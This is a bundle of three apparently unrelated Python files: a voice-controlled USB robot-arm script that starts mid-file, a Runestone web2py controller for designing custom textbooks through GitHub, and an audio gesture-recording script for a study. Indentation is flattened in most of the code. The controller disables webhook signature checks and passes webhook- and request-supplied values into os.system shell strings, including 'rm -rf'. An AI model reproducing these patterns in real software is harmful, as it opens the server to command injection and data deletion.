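# omitted, since threaded_listen above loops forever):
#
#     r = Recognizer()
#     m = Microphone()
#     def got_audio(recognizer, audio):
#         print(recognizer.recognize(audio))
#     r.listen_in_background(m, got_audio)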
def shutil_which(pgm):
"""
python2 backport of python3's shutil.which()
"""
path = os.getenv('PATH')
for p in path.split(os.path.pathsep):
p = os.path.join(p, pgm)
if os.path.exists(p) and os.access(p, os.X_OK):
return p
#The Main Function contains all the Speech functions and the USB Controls
# r.listen and r.recognize are the Speech functions
# Microphone() enables us to take speech input from the default microphone. It is the audio source.
# datapack defines the command packet to send
# changes are made to this packet to make different moves.
# first byte defines most of the movements, second byte shoulder rotation, third byte light
# outputs the command to the USB device, using the ctrl_transfer method
# 0x40, 6, 0x100, 0 defines the details of the write - bRequestType, bRequest, wValue, wIndex
# datapack is our command (3 bytes)
# the final value is a timeout (in ms) which is optional
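# Helper sketch (not used by the main loop below): every voice command follows
# the same pattern of sending a 3-byte packet, letting the motors run for a
# while, then sending an all-zero packet to stop them.
def send_arm_command(datapack, duration):
    """Send a command packet to the arm, wait, then stop the motors."""
    dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
    time.sleep(duration)
    dev.ctrl_transfer(0x40, 6, 0x100, 0, (0, 0, 0), 1000)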
#Main Function
if __name__ == "__main__":
r = Recognizer()
m = Microphone()
should_restart = True
while should_restart:
should_restart = False
print("..............")
print("..............")
print("Say something!")
print("..............")
print("..............")
with m as source:
audio = r.listen(source)
print(".............................")
print(".............................")
print("Got it! Now recognizing it...")
print(".............................")
print(".............................")
try:
word = r.recognize(audio)
#If the Speech word is Elbow Up
if word == "elbow up":
print ("Elbow Up is working!")
datapack = 0x10,0,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
time.sleep(1) # waits for 1 second whilst motors move.
# now STOP the motors
datapack=0,0,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
should_restart = True
#If the Speech word is Elbow Down
if word == "elbow down":
print ("Elbow Down is working!")
datapack = 0x20,0,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
time.sleep(1) # waits for 1 second whilst motors move.
# now STOP the motors
datapack=0,0,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
should_restart = True
#If the Speech word is Grip Close
if word == "shut":
print ("Grip Close is working!")
datapack = 0x01,0,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
time.sleep(1) # waits for 1 second whilst motors move.
# now STOP the motors
datapack=0,0,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
should_restart = True
#If the Speech word is Grip Open
if word == "open":
print ("Grip Open is working!")
datapack = 0x02,0,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
time.sleep(1) # waits for 1 second whilst motors move.
# now STOP the motors
datapack=0,0,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
should_restart = True
#If the Speech word is Shoulder Down
if word == "shoulder down":
print ("Shoulder Down is working!")
datapack = 0x80,0,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
time.sleep(2) # waits for 2 second whilst motors move.
# now STOP the motors
datapack=0,0,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
should_restart = True
#If the Speech word is Shoulder Up
if word == "shoulder up":
print ("Shoulder Up is working!")
datapack = 0x40,0,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
time.sleep(2) # waits for 2 second whilst motors move.
# now STOP the motors
datapack=0,0,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
should_restart = True
#If the Speech word is Left
if word == "left":
print ("Left is working!")
datapack = 0x00,10,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
time.sleep(2) # waits for 2 seconds whilst motors move.
# now STOP the motors
datapack=0,0,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
should_restart = True
#If the Speech word is Right
if word == "right":
print ("Right is working!")
datapack = 0x00,1,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
time.sleep(2) # waits for 2 seconds whilst motors move.
# now STOP the motors
datapack=0,0,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
should_restart = True
#If the Speech word is Light On
if word == "light on":
datapack = 0x00,0,1
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
time.sleep(5) # waits for 5 second whilst motors move.
# now STOP the motors
datapack=0,0,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
should_restart = True
#If the Speech word is Light Off
if word == "light off":
datapack = 0x00,0,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
time.sleep(1) # waits for 1 second whilst motors move.
# now STOP the motors
datapack=0,0,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
should_restart = True
#else condition
else:
print(".............................")
print(".............................")
print("I only follow valid commands!")
print(".............................")
print(".............................")
should_restart = True
except LookupError:
print(".............................................................")
print(".............................................................")
print("Couldn't understand what you said! Please say something again")
print(".............................................................")
print(".............................................................")
should_restart = True
|
designer.py
|
# -*- coding: utf-8 -*-
# this file is released under public domain and you can use without limitations
import random, string
import datetime
import logging
from threading import Thread
import requests, json, time, re, importlib, os, hashlib, hmac
logger = logging.getLogger(settings.logger)
logger.setLevel(settings.log_level)
admin_logger(logger)
#########################################################################
## This is a samples controller
## - index is the default action of any application
## - user is required for authentication and authorization
## - download is for downloading files uploaded in the db (does streaming)
## - call exposes all registered services (none by default)
#########################################################################
@auth.requires_login()
def index():
basicvalues = {}
if settings.academy_mode:
basicvalues["message"] = T("Course and Textbook Designer")
basicvalues["descr"] = T(
"""This page allows you to select a book for your own class. You will have access to all student activities in your course.
To begin, enter a project name below."""
)
return basicvalues
def logout_github():
session.auth.user.__dict__.pop("github_oauth_token", None)
session.auth.user.__dict__.pop("github_user", None)
if request.args(0) == "revoke":
redirect("https://github.com/settings/applications")
redirect(URL("designer", "book"))
def update_local_files(path, clone_url, commit_id, oldbookname=None):
do_async = True ###TODO turn to true for production
def update_async(path, clone_url, commit_id, oldbookname):
if (
oldbookname
): # try moving from oldbookname to the last part of path, but if that does not work remove oldbookname
os.system(
"cd "
+ "/".join(path.split("/")[:-1])
+ f" && (mv {oldbookname} {path.split('/')[-1]} || rm -rf {oldbookname} )"
)
def reset_local(
path, clone_url, commit_id
): # if anything goes wrong this function is called; it deletes everything and re-clones it
os.system("rm -rf " + path)
os.system("mkdir " + path)
os.system(
"cd "
+ path
+ " && cd .. && git clone "
+ clone_url
+ " "
+ path.split("/")[-1]
)
if commit_id:
os.system(
"cd " + path + " && git fetch && git reset --hard " + commit_id
)
os.system("mkdir -p " + "/".join(path.split("/")[:-1]))
try:
x = os.system(
"cd "
+ path
+ " && git symbolic-ref --short refs/remotes/origin/HEAD 1> /dev/null 2> /dev/null"
)
if (
x != 0
or os.system(
"cd "
+ path
+ " && git fetch 1> /dev/null 2> /dev/null && git reset --hard "
+ commit_id
)
!= 0
):
reset_local(path, clone_url, commit_id)
except:
reset_local(path, clone_url, commit_id)
os.system(
f"cd {path} && runestone build 1> /dev/null 2> /dev/null && runestone deploy 1> /dev/null 2> /dev/null"
)
directory_name = None
try:
directory_name = os.listdir(path + "/published")[0]
except:
logger.error(f"error setting directory name for {path}")
new_book_path = ("/").join(path.split("/")[4:6])
if directory_name:
if path.split("/")[3] == "drafts":
db.textbooks.update_or_insert(
db.textbooks.path == new_book_path, drafts_directory=directory_name
)
else:
db.textbooks.update_or_insert(
db.textbooks.path == new_book_path,
published_directory=directory_name,
)
if do_async:
Thread(
target=update_async, args=(path, clone_url, commit_id, oldbookname)
).start()
else:
update_async(path, clone_url, commit_id, oldbookname)
def update_books_webhook():
verify_webhook = False ### TODO turn to true in production
post_data_json = request.vars
textbook = db(
(db.textbooks.github_account == post_data_json["repository"]["owner"]["login"])
& (db.textbooks.github_repo_name == post_data_json["repository"]["name"])
).select()[0]
computed_hash = (
"sha256="
+ hmac.new(
textbook.webhook_code.encode("utf-8"), request.body.read(), hashlib.sha256
).hexdigest()
)
logger.debug(request.env["HTTP_X_HUB_SIGNATURE_256"] + " " + computed_hash)
if verify_webhook and not request.env["HTTP_X_HUB_SIGNATURE_256"] == computed_hash:
raise HTTP(503, "wrong hub signature!")
if textbook and (
"ref" not in post_data_json.keys()
or post_data_json["repository"]["default_branch"]
== post_data_json["ref"].split("/")[-1]
):
local_path = "applications/runestone/custom_books/drafts/" + textbook.path
if "commits" in post_data_json.keys(): # we were sent a commit
update_local_files(
local_path,
post_data_json["repository"]["clone_url"],
post_data_json["head_commit"]["id"],
)
db.textbooks.update_or_insert(
db.textbooks.path == textbook.path,
draft_commit=post_data_json["head_commit"]["id"],
)
else: # we were not sent a commit (this happens on the initial fork; in this case we will just clone the repo)
update_local_files(
local_path, post_data_json["repository"]["clone_url"], None
)
raise HTTP(200, "updated successfully")
raise HTTP(500, "internal server error")
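# Standalone sketch of the signature check used above: GitHub sends an
# X-Hub-Signature-256 header containing "sha256=" plus the HMAC-SHA256 of the
# raw request body keyed with the webhook secret. (Helper name is illustrative.)
def github_signature_is_valid(secret, body, signature_header):
    expected = "sha256=" + hmac.new(secret.encode("utf-8"), body, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, signature_header)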
def verify_github_login(desiredUser, retry=True):
if "github_oauth_token" in session.auth.user.__dict__.keys():
user = requests.get(
"https://api.github.com/user",
headers={
"Authorization": "token "
+ session.auth.user.__dict__["github_oauth_token"]
},
)
if user.status_code != 200 and retry:
location = (
"https://github.com/login/oauth/authorize?scope=repo,delete_repo&client_id="
+ session.auth.user.__dict__["github_client_id"]
)
logger.debug(
f"github token for {session.auth.user.username} expired, redirecting to refresh token"
)
session.auth.user.__dict__.pop("github_oauth_token", None)
session.auth.user.__dict__.pop("github_user", None)
raise HTTP(
303,
"You are being redirected to refresh your github token",
Location=location,
)
elif user.status_code != 200 and (not retry):
session.auth.user.__dict__.pop("github_oauth_token", None)
session.auth.user.__dict__.pop("github_user", None)
return False
else:
if user.json()["login"] == desiredUser:
session.auth.user.__dict__["github_user"] = user.json()["login"]
return True
else:
session.auth.user.__dict__.pop("github_user", None)
session.auth.user.__dict__.pop("github_oauth_token", None)
return False
else:
session.auth.user.__dict__.pop("github_user", None)
return False
def github_book_repo(
account, repo, oldb, renameval=None, delete=False, reset=False, create=False
):
ret_dict = {"changed": False, "failed": True}
auth = (
session.auth.user.__dict__["github_user"],
session.auth.user.__dict__["github_oauth_token"],
)
headers = {"Accept": "application/vnd.github.v3+json"}
base_url = "https://api.github.com/"
## sanity check API is working on githubs side and we have the correct credentials
sanity_check = requests.get(
base_url + "users/" + account + "/repos", auth=auth, headers=headers
)
if not sanity_check.status_code == 200:
ret_dict["msg"] = "unable to even connect to github API"
return ret_dict
## checking that the repo in question is either found or not found
check_existence = requests.get(
base_url + "repos/" + account + "/" + repo, auth=auth, headers=headers
)
if not (check_existence.status_code == 404 or check_existence.status_code == 200):
ret_dict[
"msg"
] = "repository gave neither a 404 nor a 200; some bad error occurred"
return ret_dict
if delete or reset:
# cant delete if nothing is there
if check_existence.status_code == 404:
ret_dict["msg"] = "nothing to delete"
return ret_dict
remove = requests.delete(
base_url + "repos/" + account + "/" + repo, auth=auth, headers=headers
)
if not remove.status_code == 204:
ret_dict["msg"] = "error with delete API request"
return ret_dict
elif delete:
return {"changed": True, "failed": False}
else:
ret_dict["changed"] = True
fork_existence = requests.get(
base_url + "repos/" + account + "/" + oldb, auth=auth, headers=headers
)
# If we are trying to create a repository that already exists, fail
# If we are going to fork into a repository that already exists as we create, fail
if (
(check_existence.status_code != 404 or fork_existence.status_code != 404)
and create
) or (fork_existence.status_code != 404 and reset):
ret_dict["msg"] = "trying to create a repo that already exists"
return ret_dict
if create or reset:
fork_url = base_url + "repos/RunestoneInteractive/" + oldb + "/forks"
requests.post(fork_url, auth=auth, headers=headers)
retries = 30
# wait for the fork to finish
while (
requests.get(
base_url + "repos/" + account + "/" + oldb, auth=auth, headers=headers
).status_code
!= 200
and retries > 0
):
time.sleep(1)
retries -= 1
if retries == 0:
ret_dict["msg"] = "timed out waiting for repo to be forked"
return ret_dict
hook_url = base_url + "repos/" + account + "/" + oldb + "/hooks"
ret_dict["webhook_code"] = "".join(
random.choice(string.ascii_lowercase + string.digits) for i in range(20)
)
hook_data = {
"config": {
"url": "https://runestone.academy/runestone/designer/update_books_webhook",
"content_type": "json",
"secret": ret_dict["webhook_code"],
}
}
requests.post(hook_url, auth=auth, headers=headers, data=json.dumps(hook_data))
requests.patch(
base_url + "repos/" + account + "/" + oldb,
auth=auth,
headers=headers,
data=json.dumps({"name": repo}),
)
ret_dict["changed"] = True
if renameval and not (check_existence.status_code == 200 or create):
ret_dict["msg"] = "trying to edit a repo that does not exist"
return ret_dict
if renameval:
requests.patch(
base_url + "repos/" + account + "/" + repo,
auth=auth,
headers=headers,
data=json.dumps({"name": renameval}),
)
ret_dict["changed"] = True
ret_dict["failed"] = False
return ret_dict
@auth.requires_login()
def book_edit():
# Verify post data is of the correct format
for id in [
"oldBookIdentifier",
"newBookIdentifier",
"baseBook",
"newGithubRepo",
"githubUser",
"oldGithubRepo",
]:
if request.vars[id] == "" or " " in request.vars[id] or "/" in request.vars[id]:
session.flash = (
f"Failed to edit book: {id} cannot be empty or contain spaces or '/'"
)
redirect(URL("designer", "book"))
elif not re.match(
"^([\x30-\x39]|[\x41-\x5A]|[\x61-\x7A]|[_-])*$", request.vars[id]
):
session.flash = f"Failed to edit book: {id} must be alphanumeric or _ -"
redirect(URL("designer", "book"))
# Create, edit, delete or publish all can work with a notion of a previous book and a new book
old_path = session.auth.user.username + "/" + request.vars.oldBookIdentifier
new_path = session.auth.user.username + "/" + request.vars.newBookIdentifier
existing_old_book = db(db.textbooks.path == old_path).select().first()
existing_new_book = db(db.textbooks.path == new_path).select().first()
new_book_is_same = existing_old_book == existing_new_book
# Ensure the github user that is sent in the request actually owns this repository
if not verify_github_login(request.vars.githubUser, False):
session.flash = f"Failed to edit book: Token expired log in again"
redirect(URL("designer", "book"))
if request.vars.changeType == "create":
if existing_new_book:
logger.error(
f"incorrect github permissions or incorrect database when trying to {request.vars.changeType} {request.vars.oldBookIdentifier}"
)
redirect(URL("designer", "book"))
changed_github = github_book_repo(
request.vars.githubUser,
request.vars.newGithubRepo,
request.vars.baseBook,
create=True,
)
if changed_github["failed"]:
session.flash = f"Failed to create book: {changed_github['msg']}"
logger.error(f"Failed to create book: {changed_github['msg']}")
redirect(URL("designer", "book"))
else:
session.flash = f"Created book: {request.vars['oldBookIdentifier']}"
db.textbooks.update_or_insert(
db.textbooks.path == new_path,
path=new_path,
github_account=request.vars.githubUser,
runestone_account=session.auth.user.username,
github_repo_name=request.vars.newGithubRepo,
regname=request.vars.newBookIdentifier,
base_book=request.vars.baseBook,
published="false",
webhook_code=changed_github["webhook_code"],
)
elif request.vars.changeType == "delete":
if (
(not existing_old_book)
or (not request.vars.githubUser == existing_old_book.github_account)
or (not session.auth.user.username == existing_old_book.runestone_account)
):
logger.error(
f"incorrect github permissions or incorrect database when trying to {request.vars.changeType} {request.vars.oldBookIdentifier}"
)
redirect(URL("designer", "book"))
changed_github = github_book_repo(
request.vars.githubUser,
request.vars.oldGithubRepo,
request.vars.baseBook,
delete=True,
)
if changed_github["failed"]:
session.flash = f"Failed to delete book: {changed_github['msg']}"
logger.error(f"Failed to delete book: {changed_github['msg']}")
redirect(URL("designer", "book"))
else:
os.system(
"rm -rf applications/runestone/custom_books/drafts/{}/{}".format(
existing_old_book.runestone_account, existing_old_book.regname
)
)
os.system(
"rm -rf applications/runestone/custom_books/published/{}/{}".format(
existing_old_book.runestone_account, existing_old_book.regname
)
)
courses = db(db.courses.base_course == old_path).select()
# all courses that are using the custom textbook now use the book that the custom textbook was originally cloned from
for course in courses:
db.courses.update_or_insert(
db.courses.course_name == course.course_name,
base_course=existing_old_book.base_book,
)
db(db.textbooks.path == old_path).delete()
session.flash = f"Deleted book: {request.vars['oldBookIdentifier']}"
elif request.vars.changeType == "edit":
if (
(not existing_old_book)
or (existing_new_book and not new_book_is_same)
or (not request.vars.githubUser == existing_old_book.github_account)
or (not session.auth.user.username == existing_old_book.runestone_account)
):
logger.error(
f"incorrect github permissions or incorrect database when trying to {request.vars.changeType} {request.vars.oldBookIdentifier}"
)
redirect(URL("designer", "book"))
if request.vars.newGithubRepo != existing_old_book.github_repo_name:
changed_github = github_book_repo(
request.vars.githubUser,
request.vars.oldGithubRepo,
request.vars.baseBook,
renameval=request.vars.newGithubRepo,
)
if changed_github["failed"]:
session.flash = f"Failed to edit book: {changed_github['msg']}"
logger.error(f"Failed to edit book: {changed_github['msg']}")
redirect(URL("designer", "book"))
session.flash = f"Edited book: {request.vars['newBookIdentifier']}"
if request.vars.oldBookIdentifier != request.vars.newBookIdentifier:
db.textbooks.update_or_insert(
db.textbooks.path == old_path,
path=new_path,
github_account=request.vars.githubUser,
runestone_account=session.auth.user.username,
github_repo_name=request.vars.newGithubRepo,
regname=request.vars.newBookIdentifier,
)
update_local_files(
"applications/runestone/custom_books/drafts/{}/{}".format(
existing_old_book.runestone_account, request.vars.newBookIdentifier
),
"https://github.com/{}/{}.git".format(
existing_old_book.github_account, request.vars.newGithubRepo
),
existing_old_book.draft_commit,
oldbookname=request.vars.oldBookIdentifier,
)
if existing_old_book.published:
update_local_files(
"applications/runestone/custom_books/published/{}/{}".format(
existing_old_book.runestone_account,
request.vars.newBookIdentifier,
),
"https://github.com/{}/{}.git".format(
existing_old_book.github_account, request.vars.newGithubRepo
),
existing_old_book.draft_commit,
oldbookname=request.vars.oldBookIdentifier,
)
courses = db(db.courses.base_course == old_path).select()
# all courses that are using the custom textbook now use the new name
for course in courses:
db.courses.update_or_insert(
db.courses.course_name == course.course_name, base_course=new_path
)
elif request.vars.changeType == "publish":
if (
(not existing_old_book)
or (not request.vars.githubUser == existing_old_book.github_account)
or (not session.auth.user.username == existing_old_book.runestone_account)
):
logger.error(
f"incorrect github permissions or incorrect database when trying to {request.vars.changeType} {request.vars.oldBookIdentifier}"
)
redirect(URL("designer", "book"))
db.textbooks.update_or_insert(
db.textbooks.path == existing_old_book.path,
published="true",
published_commit=existing_old_book.draft_commit,
)
update_local_files(
f"applications/runestone/custom_books/published/{existing_old_book.runestone_account}/{existing_old_book.regname}",
f"https://github.com/{existing_old_book.github_account}/{existing_old_book.github_repo_name}.git",
existing_old_book.draft_commit,
)
session.flash = f"Published book: {request.vars['oldBookIdentifier']}"
else:
session.flash = "invalid parameter for changeType passed to edit_book. This is an internal server error"
redirect(URL("designer", "book"))
### TODO add handling for change_type "reset"
@auth.requires_login()
def callback(): # handles github oauth callback after user grants repository permission
if "code" in request.vars.keys():
oauth_url = "https://github.com/login/oauth/access_token"
oauth_data = {
"client_id": os.getenv("CLIENT_ID"),
"client_secret": os.getenv("CLIENT_SECRET"),
"code": request.vars.code,
}
oauth_headers = {"Accept": "application/json"}
try:
oauth = requests.post(oauth_url, json=oauth_data, headers=oauth_headers)
if oauth.status_code == 200:
session.auth.user.__dict__["github_oauth_token"] = oauth.json()[
"access_token"
]
user = requests.get(
"https://api.github.com/user",
headers={"Authorization": "token " + oauth.json()["access_token"]},
)
session.auth.user.__dict__["github_user"] = user.json()["login"]
else:
session.flash = f"got {oauth.status_code} from github"
except Exception:
logger.error(
f"Failure connecting to {oauth_url}. There is either a problem with your server's connectivity or GitHub's."
)
redirect(URL("designer", "book"))
def gather_book_info(book_list, username=None):
book_list_result = []
for book in sorted(book_list):
try:
# WARNING: This imports from ``applications.<runestone application name>.books.<book name>``. Since ``runestone/books/<book_name>`` lacks an ``__init__.py``, it will be treated as a `namespace package <https://www.python.org/dev/peps/pep-0420/>`_. Therefore, odd things will happen if there are other modules named ``applications.<runestone application name>.books.<book name>`` in the Python path.
if username:
config = importlib.import_module(
"applications.{}.custom_books.drafts.{}.{}.conf".format(
request.application, username, book
)
)
else:
config = importlib.import_module(
"applications.{}.books.{}.conf".format(request.application, book)
)
except Exception as e:
logger.error("Error in book list: {}".format(e))
continue
book_info = {}
book_info.update(course_description="")
book_info.update(key_words="")
if hasattr(config, "navbar_title"):
book_info["title"] = config.navbar_title
elif hasattr(config, "html_title"):
book_info["title"] = config.html_title
elif hasattr(config, "html_short_title"):
book_info["title"] = config.html_short_title
else:
book_info["title"] = "Runestone Book"
# update course description if found in the book's conf.py
if hasattr(config, "course_description"):
book_info.update(course_description=config.course_description)
# update course key_words if found in book's conf.py
if hasattr(config, "key_words"):
book_info.update(key_words=config.key_words)
if not username: # non-custom book
book_info["url"] = "/{}/books/published/{}/index.html".format(
request.application, book
)
else: # custom book
book_info["url"] = "/{}/books/custom_books/drafts/{}/{}/index.html".format(
request.application, username, book
)
book_info[
"published_url"
] = "/{}/books/custom_books/published/{}/{}/index.html".format(
request.application, username, book
)
db_result = (
db(db.textbooks.path == session.auth.user.username + "/" + book)
.select()
.first()
)
book_info["github_repo_name"] = db_result.github_repo_name
book_info["github_account"] = db_result.github_account
book_info["published"] = db_result.published
book_info["path"] = session.auth.user.username + "/" + book
book_info["regname"] = book
book_list_result.append(book_info)
return book_list_result
@auth.requires_login()
def book():
os.system(
"mkdir -p "
+ "applications/{}/custom_books/drafts/{}".format(
request.application, session.auth.user.username
)
)
os.system(
"mkdir -p "
+ "applications/{}/custom_books/published/{}".format(
request.application, session.auth.user.username
)
)
github = {}
session.auth.user.__dict__["github_client_id"] = os.getenv("CLIENT_ID")
github["client_id"] = session.auth.user.__dict__["github_client_id"]
if "github_user" in session.auth.user.__dict__.keys():
if not verify_github_login(session.auth.user.__dict__["github_user"]):
session.auth.user.__dict__.pop("github_user", None)
session.auth.user.__dict__.pop("github_oauth_token", None)
github["found"] = False
else:
github["user"] = session.auth.user.__dict__["github_user"]
github["found"] = True
else:
github["found"] = False
book_list = os.listdir("applications/{}/books".format(request.application))
book_list = [book for book in book_list if ".git" not in book]
custom_book_list = os.listdir(
"applications/{}/custom_books/drafts/{}".format(
request.application, session.auth.user.username
)
)
custom_book_list = [book for book in custom_book_list if ".git" not in book]
book_list_result = gather_book_info(book_list)
custom_book_list_result = gather_book_info(
custom_book_list, session.auth.user.username
)
return dict(
book_list=book_list_result,
custom_book_list=custom_book_list_result,
github=github,
)
@auth.requires_login()
def course():
os.system(
"mkdir -p "
+ "applications/{}/custom_books/drafts/{}".format(
request.application, session.auth.user.username
)
)
os.system(
"mkdir -p "
+ "applications/{}/custom_books/published/{}".format(
request.application, session.auth.user.username
)
)
basicvalues = {}
if settings.academy_mode:
"""
example action using the internationalization operator T and flash
rendered by views/default/index.html or views/generic.html
"""
# response.flash = "Welcome to CourseWare Manager!"
basicvalues["message"] = T("Build a Custom Course")
basicvalues["descr"] = T(
"""This page allows you to select a book for your own class. You will have access to all student activities in your course.
To begin, enter a project name below."""
)
# return dict(message=T('Welcome to CourseWare Manager'))
custom_book_list = os.listdir(
"applications/{}/custom_books/drafts/{}".format(
request.application, session.auth.user.username
)
)
custom_book_list = [book for book in custom_book_list if ".git" not in book]
basicvalues["custom_book_list"] = gather_book_info(
custom_book_list, session.auth.user.username
)
return basicvalues
@auth.requires_login()
def course_build():
buildvalues = {}
if settings.academy_mode:
buildvalues["pname"] = request.vars.projectname
buildvalues["pdescr"] = request.vars.projectdescription
existing_course = (
db(db.courses.course_name == request.vars.projectname).select().first()
)
if existing_course:
session.flash = (
f"course name {request.vars.projectname} has already been used"
)
redirect(URL("designer", "course"))
if not request.vars.coursetype:
session.flash = "You must select a base course."
redirect(URL("designer", "course"))
# if the instructor box was checked, add a row to auth_membership
if "instructor" in request.vars:
gid = (
db(db.auth_group.role == "instructor").select(db.auth_group.id).first()
)
db.auth_membership.insert(user_id=auth.user.id, group_id=gid)
base_course = request.vars.coursetype
if request.vars.startdate == "":
request.vars.startdate = datetime.date.today()
else:
date = request.vars.startdate.split("/")
request.vars.startdate = datetime.date(
int(date[2]), int(date[0]), int(date[1])
)
if not request.vars.institution:
institution = "Not Provided"
else:
institution = request.vars.institution
if not request.vars.courselevel:
courselevel = "unknown"
else:
courselevel = request.vars.courselevel
python3 = "true"
if not request.vars.loginreq:
login_required = "false"
else:
login_required = "true"
cid = db.courses.update_or_insert(
course_name=request.vars.projectname,
term_start_date=request.vars.startdate,
institution=institution,
base_course=base_course,
login_required=login_required,
python3=python3,
courselevel=courselevel,
)
if request.vars.invoice:
db.invoice_request.insert(
timestamp=datetime.datetime.now(),
sid=auth.user.username,
email=auth.user.email,
course_name=request.vars.projectname,
)
# enrol the user in their new course
db(db.auth_user.id == auth.user.id).update(course_id=cid)
db.course_instructor.insert(instructor=auth.user.id, course=cid)
auth.user.update(
course_name=request.vars.projectname
) # also updates session info
auth.user.update(course_id=cid)
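# also record the creating user's membership in the new course in user_courses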
db.executesql(
"""
INSERT INTO user_courses(user_id, course_id)
SELECT %s, %s
""",
(auth.user.id, cid),
)
session.flash = "Course Created Successfully"
# redirect(
# URL("books", "published", args=[request.vars.projectname, "index.html"])
# )
return dict(coursename=request.vars.projectname, basecourse=base_course)
|
step1_audio_collection.py
|
# -*- coding:utf-8 -*-
import os
import sys
from os.path import dirname, join, abspath
sys.path.insert(0, abspath(join(dirname(__file__), '..')))
folder_path = os.path.dirname(abspath(__file__))
import numpy as np
import pyaudio
from pathlib import Path
import time
import wave
import argparse
import wget
import threading
import random
import json
import librosa
import librosa.display
import matplotlib.pyplot as plt
from utils.microphone import select_microphone_cmd
###########################
# Settings
###########################
with open("../GESTURE_CONFIG.json", "r") as f:
gesture_config = json.load(f)
GESTURE = gesture_config["gesture_list_formal"]
#RECORD_SECONDS = 4
RECORD_SECONDS = 3
FORMAT = pyaudio.paInt16
CHANNELS = gesture_config["channels"]
RATE = gesture_config["samplerate"]
HZ = 25
CHUNK = RATE // HZ
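# CHUNK is the number of frames captured per read: at HZ reads per second each read
# returns RATE // HZ frames, so RECORD_SECONDS of audio takes roughly
# RATE / CHUNK * RECORD_SECONDS reads (see the loop in RECORDER below).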
###########################
# Check microphones
# Then read the command line input to select a microphone
###########################
MICROPHONE_INDEX = select_microphone_cmd()
p = pyaudio.PyAudio()
u = 0
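# u holds the current participant/user ID; it is overwritten by the input() prompt in main()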
###########################
# Sub functions
###########################
def TIMER():
print('2')
time.sleep(1)
print('1')
time.sleep(1)
print('.')
time.sleep(0.5)
print('.')
time.sleep(0.5)
print('.')
time.sleep(0.5)
return
def RECORDER(NAME):
# Start 0.5s after the "2" sign shows up
p = pyaudio.PyAudio()
stream = p.open(format=FORMAT, channels=CHANNELS, rate=RATE, input=True, frames_per_buffer=CHUNK, input_device_index=MICROPHONE_INDEX)
t2 = threading.Thread(target=TIMER, args=())
t2.start()
frames = []
time.sleep(0.5)
for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):
data = stream.read(CHUNK)
frames.append(data)
stream.stop_stream()
stream.close()
p.terminate()
wf = wave.open(NAME, 'wb')
wf.setnchannels(CHANNELS)
wf.setsampwidth(p.get_sample_size(FORMAT))
wf.setframerate(RATE)
wf.writeframes(b''.join(frames))
wf.close()
# show a spectrogram right away to catch any recording errors early
# x, sr = librosa.load(NAME)
# fig, axes = plt.subplots(figsize=(18, 9), ncols = 2)
# librosa.display.waveplot(x, sr=sr, ax = axes[0])
# X = librosa.stft(x)
# Xdb = librosa.amplitude_to_db(abs(X))
# librosa.display.specshow(Xdb, sr=sr, x_axis='time', y_axis='hz', ax = axes[1])
# plt.show()
return
def RecordOnce(r,g, PATH):
global u
NAME = PATH + str(r)+'.wav'
t1 = threading.Thread(target=RECORDER, args=(NAME,))
t1.start()
t1.join()
print('Nice job! Recording done\n')
return
def Record(t, g, rept):
global u
print('\n=================')
time.sleep(0.5)
print('Test: ', t, 'of ' + str(len(GESTURE)))
print('Test description: ', GESTURE[g])
print('\n=================')
while True:
key = input('Be careful! Please pay attention to the countdown\nPress "y/1" to start: ')
if (key == 'Y' or key == 'y' or key == 1 or key == "1"):
break
r=1
PATH = folder_path + '/DataStudy1/'+str(GESTURE[g]).replace(" ","_")+'/'+'user'+str(u) + "/"
if not os.path.exists(PATH):
os.makedirs(PATH)
while r<rept+1:
RecordOnce(r,g, PATH)
# press "y/1" to save the recording; any other response discards it and the round is repeated
if r < rept:
key = input('Press "y/1" to save, or press "n/2" to discard: ').strip()
if (key == 'Y' or key == 'y' or key == 1 or key == "1"):
print('Data has been saved\n')
time.sleep(0.5)
print('Round %d is coming: \n' % (r + 1))
r = r + 1
else:
print('Data has been discarded')
time.sleep(0.5)
print('This round will be repeated: \n')
elif r == rept:
key = input('Press "y/1" to save, or press "n/2" to discard: ').strip()
if (key == 'Y' or key == 'y' or key == 1 or key == "1"):
print('\nCongratulations, this test has been completed')
print('================')
time.sleep(0.5)
print('The next test starts right away: \n' )
r = r + 1
else:
print('Data has been discarded')
time.sleep(0.5)
print('This round will be repeated: \n')
time.sleep(1)
return
###########################
# Main function
###########################
def main():
global u
u = input('Please enter your User ID: ')
print('\nHello!','\nYour ID is No.', str(u), "\n")
REPEAT = int(input('Please set the number of repetitions for each gesture: '))
print('Repeat time: ', REPEAT)
gesture_list = list(range(0,len(GESTURE)))
for session in range(1,11):
print('\nsession %s' % session)
random.shuffle(gesture_list)
for t in range(0,len(GESTURE)):
g = gesture_list[t]
Record(t+1, g, REPEAT)
print('\nsession %s finished\n' % session)
print('Congratulations! You have completed all the tests.\nThank you for your participation!\nYou can close the window now')
